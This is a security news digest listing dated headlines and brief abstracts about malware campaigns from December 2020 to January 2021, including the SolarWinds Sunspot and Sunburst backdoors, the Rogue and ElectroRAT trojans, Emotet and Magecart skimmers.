Experts discovered an Android Remote Access Trojan, dubbed Rogue, that allows attackers to take over infected devices and steal user data. Rogue is a new mobile RAT discovered by researchers from Check Point while investigating the activity of the darknet...Security Affairs
January 13, 2021
#COVID19 Led to Surge in Malware Attacks Last Year Full Text
Abstract
Malware authors continued to use COVID-19 lures to launch attacksInfosecurity Magazine
January 13, 2021
Lokibot Stealer Comes with Added Features to Hide Better While Attacking Targets Full Text
Abstract
The developers of one of the infamous information-stealers in the malware landscape have added a third stage to its process of compromising systems, along with more encryption, as a way to escape detection.Cyware Alerts - Hacker News
January 12, 2021
This Android malware claims to give hackers full control of your smartphone Full Text
Abstract
The 'Rogue' RAT infects victims with a keylogger, allowing attackers to easily monitor the use of websites and apps in order to steal usernames and passwords, as well as financial data.ZDNet
January 12, 2021
New Sunspot malware found while investigating SolarWinds hack Full Text
Abstract
Cybersecurity firm CrowdStrike has discovered the malware used by the SolarWinds hackers to inject backdoors in Orion platform builds during the supply-chain attack that led to the compromise of several companies and government agencies.BleepingComputer
January 12, 2021
Sunspot, the third malware involved in the SolarWinds supply chain attack Full Text
Abstract
Cybersecurity firm CrowdStrike announced to have discovered a third malware strain, named Sunspot, directly involved in the SolarWinds supply chain attack. According to a new report published by the cybersecurity firm Crowdstrike, a third malware,...Security Affairs
January 12, 2021
Experts Sound Alarm On New Android Malware Sold On Hacking Forums Full Text
Abstract
Cybersecurity researchers have exposed the operations of an Android malware vendor who teamed up with a second threat actor to market and sell a remote access Trojan (RAT) capable of device takeover and exfiltration of photos, locations, contacts, and messages from popular apps such as Facebook, Instagram, WhatsApp, Skype, Telegram, Kik, Line, and Google Messages. The vendor, who goes by the name of "Triangulum" in a number of darknet forums, is alleged to be a 25-year-old man of Indian origin, with the individual opening up shop to sell the malware three years ago on June 10, 2017, according to an analysis published by Check Point Research today. "The product was a mobile RAT, targeting Android devices and capable of exfiltration of sensitive data from a C&C server, destroying local data – even deleting the entire OS, at times," the researchers said. An Active Underground Market for Mobile Malware Piecing together Triangulum's trail of activities, tThe Hacker News
January 12, 2021
Third Malware Strain Discovered as Part of SolarWinds Attack Full Text
Abstract
Sunspot used to inject Sunburst into Orion platform, says CrowdStrikeInfosecurity Magazine
January 12, 2021
Third Malware Strain Sunspot Discovered in SolarWinds Supply Chain Attack Full Text
Abstract
CrowdStrike, one of the companies directly involved in investigating the SolarWinds supply chain attack, said today it identified a third malware strain directly involved in the recent hack.ZDNet
January 11, 2021
Unveiled: SUNSPOT Malware Was Used to Inject SolarWinds Backdoor Full Text
Abstract
As the investigation into the SolarWinds supply-chain attack continues, cybersecurity researchers have disclosed a third malware strain that was deployed into the build environment to inject the backdoor into the company's Orion network monitoring platform. Called "Sunspot," the backdoor adds to a growing list of previously disclosed malicious software such as Sunburst and Teardrop. "This highly sophisticated and novel code was designed to inject the Sunburst malicious code into the SolarWinds Orion Platform without arousing the suspicion of our software development and build teams," SolarWinds' new CEO Sudhakar Ramakrishna explained. While preliminary evidence found that operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, the latest findings reveal a new timeline that establishes the first breach ofThe Hacker News
January 11, 2021
Microsoft Sysmon now detects malware process tampering attempts Full Text
Abstract
Microsoft has released Sysmon 13 with a new security feature that detects if a process has been tampered with using process hollowing or process herpaderping techniques.BleepingComputer
January 11, 2021
Mac malware uses ‘run-only’ AppleScripts to evade analysis Full Text
Abstract
A cryptocurrency mining campaign targeting macOS is using malware that has evolved into a complex variant giving researchers a lot of trouble analyzing it.BleepingComputer
January 11, 2021
xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement Full Text
Abstract
The actor used the BumbleBee webshell to upload and download files to and from the compromised Exchange server, but more importantly, to move laterally to other servers on the network.Palo Alto Networks
January 11, 2021
Researchers Find Links Between Sunburst and Russian Kazuar Malware Full Text
Abstract
Cybersecurity researchers, for the first time, may have found a potential connection between the backdoor used in the SolarWinds hack and a previously known malware strain. In new research published by Kaspersky researchers today, the cybersecurity firm said it discovered several features that overlap with another backdoor known as Kazuar, a .NET-based malware first documented by Palo Alto Networks in 2017. Disclosed early last month, the espionage campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to infiltrate government agencies and other companies so as to deploy a custom malware codenamed "Sunburst." Shared Features Between Sunburst and Kazuar Attribution for the SolarWinds supply-chain compromise has been difficult in part due to little-to-no clues linking the attack infrastructure to previous campaigns or other well-known threat groups. But Kaspersky's latest analysis of thThe Hacker News
January 11, 2021
Source code for malware that targets Qiui Cellmate device was leaked online Full Text
Abstract
The source code for the ChastityLock ransomware that was used in attacks aimed at the users of the Qiui Cellmate adult toy is now publicly available. Recently a family of ransomware was observed targeting the users of the Bluetooth-controlled Qiui...Security Affairs
January 11, 2021
Fake Trump’s Scandal Video Used to Deliver QNode Malware Full Text
Abstract
The cybersecurity researchers at Trustwave have identified a new malspam campaign while reviewing a spam trap. However, this campaign shares a remote...Cyber Security News
January 10, 2021
Golang-based Malware Trends Among Cyberattackers Full Text
Abstract
The multi-platform language enables a single malware codebase to be compiled into versions for all major operating systems such as Linux, Windows, and Mac.Cyware Alerts - Hacker News
January 9, 2021
Emotet remains the biggest malicious threat to your network in 2021 Full Text
Abstract
A malicious spam campaign that targeted over a hundred thousand users a day over Christmas and New Year has seen Emotet secure its spot as the most prolific malware threat.ZDNet
January 8, 2021
Malware variant becomes world’s most popular, thanks to ransomware surge Full Text
Abstract
Ransomware actors are laundering hundreds of millions of dollars through pseudo-legitimate cryptocurrency exchanges, while the early-stage malware that is often used to facilitate their attacks has become the most popular form of malware in the world.SCMagazine
January 8, 2021
Malicious Software Infrastructure Easier to Get and Deploy Than Ever Full Text
Abstract
Researchers at Recorded Future report a rise in cracked Cobalt Strike and other open-source adversarial tools with easy-to-use interfaces.Threatpost
January 8, 2021
FBI Warns of Egregor Attacks on Businesses Worldwide Full Text
Abstract
The agency said the malware has already compromised more than 150 organizations and provided insight into its ransomware-as-a-service behavior.Threatpost
January 8, 2021
President Trump-themed Malspam Email Delivers QRat trojan Full Text
Abstract
Cybersecurity researchers revealed a new QRat malspam campaign purporting to contain a scandalous video of the U.S. President Donald Trump.Cyware Alerts - Hacker News
January 8, 2021
December 2020’s Most Wanted Malware: Emotet Returns as Top Malware Threat Full Text
Abstract
First identified in 2014, Emotet has been regularly updated by its developers. The DHS has estimated that each incident involving Emotet costs organizations upwards of $1 million to rectify.Check Point Research
January 8, 2021
Emotet Tops Malware Charts in December After Reboot Full Text
Abstract
Check Point reveals Trojan has had another makeoverInfosecurity Magazine
January 8, 2021
Minecraft-Themed Fleeceware Apps Hide Steep Fees Full Text
Abstract
A fleeceware app isn’t traditional Android malware in the sense that it doesn’t contain malicious code. Instead, the threat comes from excessive subscription fees that it might not clearly advertise.Security Intelligence
January 8, 2021
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 Full Text
Abstract
The penetration testing toolkits have been used to host more than a quarter of all the malware C&C servers deployed in 2020, threat intelligence firm Recorded Future said in a report today.ZDNet
January 8, 2021
Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer Full Text
Abstract
The “customers,” also known as the attackers, contact Oski authors on underground forums to purchase the malware and, once purchased, they configure it and distribute it to their victims.Cyberark
January 8, 2021
Ezuri memory loader used in Linux and Windows malware Full Text
Abstract
Multiple threat actors have recently started using the Ezuri memory loader to execute malware directly in the victims' memory. According to researchers from AT&T's Alien Labs, malware authors are choosing the Ezuri memory loader...Security Affairs
January 7, 2021
Malspam campaign spoofs email chains to install IcedID info-stealer Full Text
Abstract
A phishing campaign has been disguising its spam as an email chain, using messages taken from email clients on previously compromised hosts.SCMagazine
January 7, 2021
Trump Sex Scandal Video Is a RAT Full Text
Abstract
Cyber-attackers lure victims with promise of sex video starring President TrumpInfosecurity Magazine
January 07, 2021
Linux malware authors use Ezuri Golang crypter for zero detection Full Text
Abstract
Multiple malware authors are using the "Ezuri" crypter and memory loader written in Go to evade detection by antivirus products. Source code for Ezuri is available on GitHub for anyone to use.BleepingComputer
January 7, 2021
A Deep Dive into Lokibot Infection Chain Full Text
Abstract
This sample is using the known technique of blurring images in documents to encourage users to enable macros. While quite simple this is fairly common and effective against users.Talos
January 7, 2021
Operation ElectroRAT – Attacker Creates Fake Companies to Steal Cryptocurrencies Full Text
Abstract
Security researchers at Intezer Labs have discovered a Remote Access Trojan (RAT). The attacker behind this operation has enticed cryptocurrency users to download...Cyber Security News
January 6, 2021
It’s Not the Trump Sex Tape, It’s a RAT Full Text
Abstract
Criminals are using the end of the Trump presidency to deliver a new remote-access trojan (RAT) variant disguised as a sex video of the outgoing POTUS, researchers report.Threatpost
January 6, 2021
ElectroRAT Drains Crypto Wallets Full Text
Abstract
Attacker creates fake companies and new remote access tool to steal cryptocurrency in year-long campaignInfosecurity Magazine
January 6, 2021
New Golang Worm Drops XMRig Miner Full Text
Abstract
A new worm written in Golang turns Windows and Linux servers into XMRig miners. Researchers say it may be preparing to target additional weakly configured services in its future updates.Cyware Alerts - Hacker News
January 6, 2021
Fake Trump sex video used to spread QNode RAT Full Text
Abstract
Researchers uncovered a malspam campaign that spreads the QNode remote access Trojan (RAT) using a fake Trump sex scandal video as bait. Security experts from Trustwave uncovered a malspam campaign that is delivering the QNode remote access Trojan...Security Affairs
January 06, 2021
Hackers Using Fake Trump’s Scandal Video to Spread QNode Malware Full Text
Abstract
Cybersecurity researchers today revealed a new malspam campaign that distributes a remote access Trojan (RAT) by purporting to contain a sex scandal video of U.S. President Donald Trump. The emails, which carry the subject line "GOOD LOAN OFFER!!," come attached with a Java archive (JAR) file called "TRUMP_SEX_SCANDAL_VIDEO.jar," which, when downloaded, installs Qua or Quaverse RAT (QRAT) onto the infiltrated system. "We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email's theme," Trustwave's Senior Security Researcher Diana Lopera said in a write-up published today. The latest campaign is a variant of the Windows-based QRAT downloader Trustwave researchers discovered in August. The infection chain starts with a spam message containing an embedded attachment or a link pointing to a mThe Hacker News
January 6, 2021
Bogus CSS Injection Leads to Stolen Credit Card Details Full Text
Abstract
Attackers leverage holes in default security configurations on Magento stores to inject a CSS code that has the capability to siphon off the credit card details of unsuspecting users.Sucuri
January 6, 2021
Researchers Disclose Details of FIN7 Hacking Group’s Malware Full Text
Abstract
Researchers at Morphisec Labs have published fresh details about a malware variant called JSSLoader, written in the .NET language, that the FIN7 hacking group has used for several years.Gov Info Security
January 5, 2021
Thousands infected by trojan that targets cryptocurrency users on Windows, Mac and Linux Full Text
Abstract
A new remote access trojan (RAT) lures cryptocurrency users to download trojanized apps by promoting the apps in dedicated online forums and on social media.SCMagazine
January 5, 2021
New ElectroRAT employed in a wide-ranging operation targeting cryptocurrency users Full Text
Abstract
Researchers uncovered a large scale operation targeting cryptocurrency users with a previously undetected multiplatform RAT named ElectroRAT. Security researchers from Intezer uncovered a large scale operation targeting cryptocurrency users with a previously...Security Affairs
January 05, 2021
Australian cybersecurity agency used as cover in malware campaign Full Text
Abstract
The Australian government warns of an ongoing campaign impersonating the Australian Cyber Security Centre (ACSC) to infect targets with malware.BleepingComputer
January 05, 2021
Cross-platform ElectroRAT malware drains cryptocurrency wallets Full Text
Abstract
Security researchers have discovered a new remote access trojan (RAT) used to empty the cryptocurrency wallets of thousands of Windows, Linux, and macOS users.BleepingComputer
January 05, 2021
Warning: Cross-Platform ElectroRAT Malware Targeting Cryptocurrency Users Full Text
Abstract
Cybersecurity researchers today revealed a wide-ranging scam targeting cryptocurrency users that began as early as January last year to distribute trojanized applications to install a previously undetected remote access tool on target systems. Called ElectroRAT by Intezer, the RAT is written from the ground up in Golang and designed to target multiple operating systems such as Windows, Linux, and macOS. The apps are developed using the open-source Electron cross-platform desktop app framework. "ElectroRAT is the latest example of attackers using Golang to develop multi-platform malware and evade most antivirus engines," the researchers said. "It is common to see various information stealers trying to collect private keys to access victims' wallets. However, it is rare to see tools written from scratch and targeting multiple operating systems for these purposes." The campaign, first detected in December, is believed to have claimed over 6,500 victims based on thThe Hacker News
January 5, 2021
ElectroRAT Drains Cryptocurrency Wallet Funds of Thousands Full Text
Abstract
At least 6,500 cryptocurrency users have been infected by new, ‘extremely intrusive’ malware that’s spread via trojanized macOS, Windows and Linux apps.Threatpost
January 5, 2021
Malware uses WiFi BSSID for victim identification Full Text
Abstract
In a blog post last month, Xavier Mertens, a security researcher with the SANS Internet Storm Center, said he discovered a new malware strain that is using WiFi BSSID for victim identification.ZDNet
January 4, 2021
SolarWinds mess flared in the holidays - company confirms malware targeted crocked Orion product Full Text
Abstract
The extent and impact of the SolarWinds hack became even more apparent – and terrifying – over the holiday break. On New Year’s Eve, SolarWinds confirmed that it has identified malware that exploited the flaws introduced to Orion products.The Register
January 4, 2021
New alleged MuddyWater attack downloads a PowerShell script from GitHub Full Text
Abstract
This PowerShell script is also used by threat actors to download a legitimate image file from image hosting service Imgur and decode an embedded Cobalt Strike script to target Windows systems.Security Affairs
January 4, 2021
A closer look at fileless malware, beyond the network Full Text
Abstract
Fileless malware is a bit of a misnomer. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim’s storage drive, fileless malware’s malicious actions reside solely in memory.Help Net Security
January 4, 2021
New alleged MuddyWater attack downloads a PowerShell script from GitHub Full Text
Abstract
Security expert spotted a new piece of malware that leverages weaponized Word documents to download a PowerShell script from GitHub. Security expert discovered a new piece of malware that uses weaponized Word documents to download a PowerShell...Security Affairs
January 2, 2021
A Credential Stealer Written in AutoHotkey Scripting Language Full Text
Abstract
Financial institutions in the U.S. and Canada are under threat from a new credential stealer that targets various browsers such as Chrome, Opera, and Microsoft Edge.Cyware Alerts - Hacker News
January 2, 2021
AutoHotkey-Based credential stealer targets banks in the US and Canada Full Text
Abstract
Experts spotted a new credential stealer written in the AutoHotkey (AHK) scripting language that is targeting US and Canadian bank customers. Security experts from Trend Micro have discovered a new credential stealer written in AutoHotkey (AHK) scripting...Security Affairs
January 1, 2021
New Malware Strain Abuses GitHub and Imgur Full Text
Abstract
Researchers reported a new strain of malware, purportedly by the MuddyWater APT group, that downloads a PowerShell script from GitHub and Imgur to targeted systems.Cyware Alerts - Hacker News
December 31, 2020
New Golang-based Crypto worm infects Windows and Linux servers Full Text
Abstract
Experts from Intezer discovered a new and self-spreading Golang-based malware that targets Windows and Linux servers. Experts from Intezer discovered a Golang-based worm that targets Windows and Linux servers. The malware has been active since...Security Affairs
December 31, 2020
Emotet campaign hits Lithuania’s National Public Health Center and several state institutions Full Text
Abstract
An Emotet campaign hit Lithuania; the malware has infected systems at the National Center for Public Health (NVSC) and several municipalities. A large-scale Emotet campaign hit Lithuania; the malware has infected the networks of Lithuania's National...Security Affairs
December 30, 2020
New Golang worm turns Windows and Linux servers into monero miners Full Text
Abstract
The potential number of systems is staggering: There are 5.5 million MySQL, Tomcat, Jenkins, and WebLogic devices connected to the internet that could be vulnerable.SCMagazine
December 30, 2020
Emotet malware hits Lithuania’s National Public Health Center Full Text
Abstract
The internal networks of Lithuania's National Center for Public Health (NVSC) and several municipalities have been infected with Emotet malware following a large campaign targeting the country's state institutions.BleepingComputer
December 30, 2020
New worm turns Windows, Linux servers into Monero miners Full Text
Abstract
A newly discovered and self-spreading Golang-based malware has been actively dropping XMRig cryptocurrency miners on Windows and Linux servers since early December.BleepingComputer
December 29, 2020
Eliciting Current Activities of Malicious Browser Extensions Full Text
Abstract
A large user base makes it quite easy for cybercriminals to publish malicious browser extensions that perform illicit activities, including spying and data theft, among others.Cyware Alerts - Hacker News
December 29, 2020
Pegasus Spyware: Now Targets New Zero-Day in iPhone Full Text
Abstract
Four nation-state-backed APTs abused Pegasus phone-surveillance solution to target 36 Al Jazeera members by exploiting a zero-day in iPhones, in an espionage attack.Cyware Alerts - Hacker News
December 29, 2020
Mac Attackers Remain Focused Mainly on Adware, Fooling Users Full Text
Abstract
In February 2020, Malwarebytes reported that its Mac users encountered about twice as many "threats" as Windows users. However, it mainly included potentially unwanted programs (PUPs) and adware.Dark Reading
December 29, 2020
AutoHotkey-Based Password Stealer Targeting US, Canadian Banking Users Full Text
Abstract
Threat actors have been discovered distributing a new credential stealer written in the AutoHotkey (AHK) scripting language as part of an ongoing campaign that started in early 2020. Customers of financial institutions in the US and Canada are among the primary targets for credential exfiltration, with a specific focus on banks such as Scotiabank, Royal Bank of Canada, HSBC, Alterna Bank, Capital One, Manulife, and EQ Bank. Also included in the list is the Indian banking firm ICICI Bank. AutoHotkey is an open-source custom scripting language for Microsoft Windows aimed at providing easy hotkeys for macro creation and software automation that allows users to automate repetitive tasks in any Windows application. The multi-stage infection chain commences with a malware-laced Excel file that's embedded with a Visual Basic for Applications (VBA) AutoOpen macro, which is subsequently used to drop and execute the downloader client script ("adb.ahk") via a legitimate portable AHKThe Hacker News
December 28, 2020
GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic Full Text
Abstract
A new strain of malware uses Word files with macros to download a PowerShell script from GitHub. This PowerShell script further downloads a legitimate image file from the image hosting service Imgur to decode a Cobalt Strike script.BleepingComputer
December 27, 2020
Attackers Increasingly Adopting VBA-based Attack Techniques Full Text
Abstract
In this technique, malicious Office documents containing VBA code are saved within streams of CFBF files, with VBA macros saving data in a hierarchy including various types of streams.Cyware Alerts - Hacker News
December 27, 2020
Gitpaste-12 Adds New Features to its Arsenal Full Text
Abstract
The recent attacks use payloads hosted on a new GitHub repository, which includes a Linux-based cryptominer, a list of passwords for brute-force attacks, and a statically linked Python 3.9 interpreter.Cyware Alerts - Hacker News
December 27, 2020
New SignSight Supply-Chain Attack Targeted Certification Authority in Southeast Asia Twice Full Text
Abstract
The attackers made changes to software installers available for download from a Vietnam government website. In addition, they added a backdoor to target users of a legitimate application.Cyware Alerts - Hacker News
December 27, 2020
Understanding & Detecting the SUPERNOVA Webshell Trojan Full Text
Abstract
The recent supply chain attack has proven to be one of the most damaging attacks of 2020. Several distinct malware families have emerged in relation to the compromise. These include the SUNBURST backdoor, SUPERNOVA, COSMICGALE & TEARDROP.Sentinel One
December 27, 2020
What We Have Learned So Far about the “Sunburst”/SolarWinds Hack Full Text
Abstract
After a successful infiltration of the supply-chain, the SunBurst backdoor— a file named SolarWinds.Orion.Core.BusinessLayer.dll—was inserted into the software distribution system and installed as part of an update package from the vendor.Fortinet
December 27, 2020
SolarWinds releases updated advisory for SUPERNOVA backdoor Full Text
Abstract
SolarWinds released an updated advisory for the SuperNova malware discovered while investigating the recent supply chain attack. SolarWinds has released an updated advisory for the SuperNova backdoor that was discovered while investigating the recent...Security Affairs
December 27, 2020
Kaspersky Warns Against Dangerous Chrome extensions Full Text
Abstract
These extensions installed in more than 8 million users’ browsers accessed a remote server in the background, trying to download malicious code, a process that our security solutions detect as dangerous.Kaspersky Lab
December 26, 2020
SolarWinds releases updated advisory for new SUPERNOVA malware Full Text
Abstract
SolarWinds has released an updated advisory for the additional SuperNova malware discovered to have been distributed through the company's network management platform.BleepingComputer
December 26, 2020
SUNBURST Performs Anti-Analysis Environment Checks Before Contacting C2 Server Full Text
Abstract
Before reaching out to its C2 server, SUNBURST performs numerous checks to ensure no analysis tools are present. It checks process names, file write timestamps, and Active Directory (AD) domains before proceeding.FireEye
December 26, 2020
10 Different Types of Dangerous Malware Attack and How to Avoid them Full Text
Abstract
Today's topic is types of malware: malicious software designed to damage, impair, or exploit...Cyber Security News
December 26, 2020
How to Detect and Search for SolarWinds IOCs in LogRhythm Full Text
Abstract
LogRhythm Labs has gathered up the IOCs from CISA, Volexity, and FireEye associated with the recent SolarWinds supply chain attack and made them available in a GitHub repository.LogRhythm
December 25, 2020
Fake Amazon gift card emails deliver the Dridex malware Full Text
Abstract
The Dridex malware gang is delivering a nasty gift for the holidays using a spam campaign pretending to be Amazon Gift Cards.BleepingComputer
December 24, 2020
SolarStorm Timeline: Details of the Software Supply-Chain Attack Full Text
Abstract
While this is not the first software supply-chain compromise, it may be the most notable, as the attacker was trying to gain widespread, persistent access to a number of critical networks.Palo Alto Networks
December 24, 2020
Stealthy Magecart Accidentally Leaks the List of Infected Stores Full Text
Abstract
Recently, Sansec found a clever remote access trojan (RAT) that has been lurking on hacked eCommerce servers. According...Cyber Security News
December 23, 2020
SolarWinds Campaign Focuses Attention on ‘Golden SAML’ Attack Vector Full Text
Abstract
According to Sygnia, the Golden SAML technique involves attackers first gaining administrative access to an organization's ADFS server and stealing the necessary private key and signing certificate.Dark Reading
December 22, 2020
Hackers Hide Malware in RubyGems Packages Full Text
Abstract
Actors are using malicious RubyGems packages in a supply chain attack to steal cryptocurrency from potential victims. Such attempts by cyber adversaries signal growing threats from various software components.Cyware Alerts - Hacker News
December 22, 2020
Brand New Agent Tesla Now has Improved Data Exfiltration Features Full Text
Abstract
Less-popular web browsers and email clients are under attack by the infamous keylogger Agent Tesla, which is also expanding in its targets with improved data exfiltration features.Cyware Alerts - Hacker News
December 21, 2020
New AridViper Malware Targets Outlook Users Full Text
Abstract
Palo Alto’s Unit42 research team has recently found hacking group AridViper (aka APT-C-23) dropping a new malware called PyMicropsia to target victims in the Middle Eastern region.Cyware Alerts - Hacker News
December 21, 2020
Malicious Chrome & Edge Extensions Installs Over 3 Million Store Full Text
Abstract
Czech Internet security giant Avast found out on December 16th that around 3 million people all over the world have been infected...Cyber Security News
December 21, 2020
Dozens of Journalists’ iPhones Hacked with NSO ‘Zero-Click’ Spyware Full Text
Abstract
Citizen Lab researchers say they have found evidence that dozens of journalists had their iPhones silently compromised with spyware known to be used by nation-states. The spyware was silently delivered, likely over iMessage.TechCrunch
December 19, 2020
The SolarWinds cyberattack: The hack, the victims, and what we know Full Text
Abstract
Since the SolarWinds supply chain attack was disclosed last Sunday, there has been a whirlwind of news, technical details, and analysis released about the hack. Because the amount of information that was released in such a short time is definitely overwhelming, we have published this as a roundup of this week's SolarWinds news.BleepingComputer
December 18, 2020
Stealthy Magecart malware mistakenly leaks list of hacked stores Full Text
Abstract
A list of dozens of online stores hacked by a web skimming group was inadvertently leaked by a dropper used to deploy a stealthy remote access trojan (RAT) on compromised e-commerce sites.BleepingComputer
December 18, 2020
The Strategic Implications of SolarWinds Full Text
Abstract
The infiltration by Russia emphasizes the importance of implementing the layered deterrence strategy recommended by the U.S. Cyber Solarium Commission.Lawfare
December 18, 2020
‘SocGholish’ Attack Framework Powers Surge in Drive-By Attacks Full Text
Abstract
SocGholish impersonates legitimate browser, Flash, and Microsoft Teams updates to trick users into executing malicious ZIP files that are automatically downloaded on visiting an infected webpage.Dark Reading
December 17, 2020
3 million users hit with infected Google Chrome and Microsoft Edge extensions Full Text
Abstract
Google Chrome, specifically, accounts for about 70 percent of the browser market share, making its extensions an efficient mechanism for targeting users with malware.SCMagazine
December 17, 2020
5 million WordPress sites potentially impacted by a Contact Form 7 flaw Full Text
Abstract
The development team behind the Contact Form 7 WordPress plugin discloses an unrestricted file upload vulnerability. Jinson Varghese Behanan from Astra Security discovered an unrestricted file upload vulnerability in the popular Contact Form 7 WordPress...Security Affairs
December 17, 2020
RubyGems Packages Laced with Bitcoin-Stealing Malware Full Text
Abstract
Two malicious software building blocks that could be baked into web applications prey on unsuspecting users.Threatpost
December 17, 2020
3M Users Targeted by Malicious Facebook, Insta Browser Add-Ons Full Text
Abstract
Researchers identify malware existing in popular add-ons for Facebook, Vimeo, Instagram and others that are commonly used in browsers from Google and Microsoft.Threatpost
December 17, 2020
Skimming a Little Off the Top: ‘Meyhod’ Skimmer Hits Hair Loss Specialists Full Text
Abstract
Meyhod itself is simple compared to the Magecart web payment skimmers we've recently analyzed, such as the new variant of the Grelos skimmer and the Ant and Cockroach skimmer.Risk IQ
December 17, 2020
Experts spotted browser malicious extensions for Instagram, Facebook and others Full Text
Abstract
Avast researchers reported that three million users installed 28 malicious Chrome or Edge extensions that could perform several malicious operations. Avast Threat Intelligence researchers spotted malicious Chrome and Edge browser extensions that...Security Affairs
December 17, 2020
Malicious Domain in SolarWinds Hack Turned into ‘Killswitch’ Full Text
Abstract
A malicious domain used to control potentially thousands of compromised computer systems was commandeered by security experts and used as 'killswitch' to turn the cybercrime operation against itself.Krebs on Security
December 17, 2020
Malicious Chrome and Edge Extensions Affect Millions of Users Full Text
Abstract
Avast urges users to uninstall now or risk phishing and data theft.Infosecurity Magazine
December 17, 2020
New IRS Form Fraud Campaign Targets G Suite Users Full Text
Abstract
A new scam using an IRS form as its mechanism has been found targeting users of Google's G Suite, with as many as 50,000 executives and "important" employees affected so far.Dark Reading
December 17, 2020
E-Commerce Skimming is the New POS Malware Full Text
Abstract
POS malware planted on payment processing devices has enabled threat actors to steal payment card data from terminals at retail stores, hotels, restaurants and other establishments since at least 2008.Security Intelligence
December 17, 2020
New Information Stealer Trojan that Steals Browser Credentials, Outlook Files Full Text
Abstract
A new information-stealing Trojan with relations to the MICROPSIA malware family has been identified, which targets Microsoft Windows systems with an onslaught of data-exfiltration capabilities...Cyber Security News
December 17, 2020
FireEye, GoDaddy, and Microsoft created a kill switch for SolarWinds backdoor Full Text
Abstract
Microsoft, FireEye, and GoDaddy have partnered to create a kill switch for the Sunburst backdoor that was employed in the recent SolarWinds hack. Microsoft, FireEye, and GoDaddy have created a kill switch for the Sunburst backdoor that was used in SolarWinds...Security Affairs
December 16, 2020
Malicious Chrome, Edge extensions with 3M installs still in stores Full Text
Abstract
Malicious Chrome and Edge browser extensions with over 3 million installs, most of them still available on the Chrome Web Store and the Microsoft Edge Add-ons portal, are capable of stealing users' info and redirecting them to phishing sites.BleepingComputer
December 16, 2020
FireEye, Microsoft create kill switch for SolarWinds backdoor Full Text
Abstract
Microsoft, FireEye, and GoDaddy have collaborated to create a kill switch for the SolarWinds Sunburst backdoor that forces the malware to terminate itself.BleepingComputer
December 16, 2020
Sextortionists Deploy New Spyware Full Text
Abstract
Goontact targets iOS and Android users in Asia who visit sites selling escort services.Infosecurity Magazine
December 16, 2020
Zebrocy’s Evolution with Golang-Based Version Enjoys Low Detection Full Text
Abstract
Researchers observed a VHD file containing a PDF document and an executable file masquerading as a Microsoft Word document, which actually contained the Zebrocy malware.Cyware Alerts - Hacker News
December 16, 2020
Sextortionist Campaign Targets iOS, Android Users with New Spyware Full Text
Abstract
Goontact lures users of illicit sites through Telegram and other secure messaging apps and steals their information for future fraudulent use.Threatpost
December 16, 2020
Malicious RubyGems packages used in cryptocurrency supply chain attack Full Text
Abstract
New malicious RubyGems packages have been discovered that are being used in a supply chain attack to steal cryptocurrency from unsuspecting users.BleepingComputer
December 16, 2020
New Goontact spyware discovered targeting Android and iOS users Full Text
Abstract
Named Goontact, this mobile malware has the ability to collect from infected victims data such as phone identifiers, contacts, SMS messages, photos, and location information.ZDNet
December 16, 2020
Sextortion campaign uses Goontact spyware to target Android and iOS users Full Text
Abstract
Security experts spotted a new malware strain, named Goontact, that allows its operators to spy on both Android and iOS users. Security researchers from Lookout have discovered new spyware, dubbed Goontact, that could target both Android and iOS users. Goontact...Security Affairs
December 16, 2020
Microsoft Set to Block SolarWinds Orion Binaries Full Text
Abstract
Malicious updates were responsible for recent Russian attacks.Infosecurity Magazine
December 16, 2020
Microsoft to quarantine SolarWinds apps linked to recent hack starting tomorrow Full Text
Abstract
Microsoft announced today plans to start forcibly blocking and isolating versions of the SolarWinds Orion app that are known to have contained the Solorigate (SUNBURST) malware.ZDNet
December 16, 2020
PyMICROPSIA Windows malware includes checks for Linux and macOS Full Text
Abstract
Experts discovered a new Windows info-stealer, named PyMICROPSIA, linked to AridViper group that is rapidly evolving to target other platforms. Experts from Palo Alto Networks's Unit 42 discovered a new Windows info-stealing malware, named PyMICROPSIA,...Security Affairs
December 15, 2020
Microsoft to quarantine compromised SolarWinds binaries tomorrow Full Text
Abstract
Microsoft has announced today that Microsoft Defender will begin quarantining compromised SolarWinds Orion binaries starting tomorrow morning.BleepingComputer
December 15, 2020
Adrozek Malware Silently Hijacks Microsoft Edge, Google Chrome, Yandex & Firefox Browsers Full Text
Abstract
Recently, Microsoft 365 Defender Research affirmed that they had recorded a new malware that has been continuously attacking popular browsers like Google...Cyber Security News
December 15, 2020
New Windows malware may soon target Linux, macOS devices Full Text
Abstract
Newly discovered Windows info-stealing malware linked to an active threat group tracked as AridViper shows signs that it might be used to infect computers running Linux and macOS.BleepingComputer
December 15, 2020
Global Campaign Uses Sunburst Malware to Target Government Agencies Worldwide Full Text
Abstract
The campaign has targeted consulting, technology, telecom, and other entities such as multiple federal government agencies, including the US Treasury and Commerce departments.Cyware Alerts - Hacker News
December 15, 2020
Kaspersky researchers found 360,000 malicious files per day in 2020 Full Text
Abstract
The vast majority of the malicious files detected – 89.8 percent – occurred via Windows PE files, a file format specific to Windows operating systems.SCMagazine
December 15, 2020
Gitpaste-12 Worm Widens Set of Exploits in New Attacks Full Text
Abstract
The worm returned in recent attacks against web applications, IP cameras and routers.Threatpost
December 15, 2020
SolarWinds Orion and UNC2452 – Summary and Recommendations Full Text
Abstract
The Russia-linked UNC2452 threat actor group has been observed leveraging a supply chain compromise to serve backdoored updates for the SolarWinds Orion Platform software.TrustedSec
December 15, 2020
SoReL-20M Sophos & ReversingLabs release 10 million disarmed samples for malware study Full Text
Abstract
Sophos and ReversingLabs released SoReL-20M, a database containing 20 million Windows Portable Executable files, including 10M malware samples. Sophos and ReversingLabs announced the release of SoReL-20M, a database containing 20 million Windows Portable...Security Affairs
December 15, 2020
SoReL-20M: Sophos & ReversingLabs release 10 million disarmed samples for malware study Full Text
Abstract
Sophos and ReversingLabs announced the release of SoReL-20M, a database containing 20 million Windows Portable Executable (PE) files, including 10 million malware samples.Security Affairs
December 14, 2020
PyMICROPSIA: New Information-Stealing Trojan from AridViper Full Text
Abstract
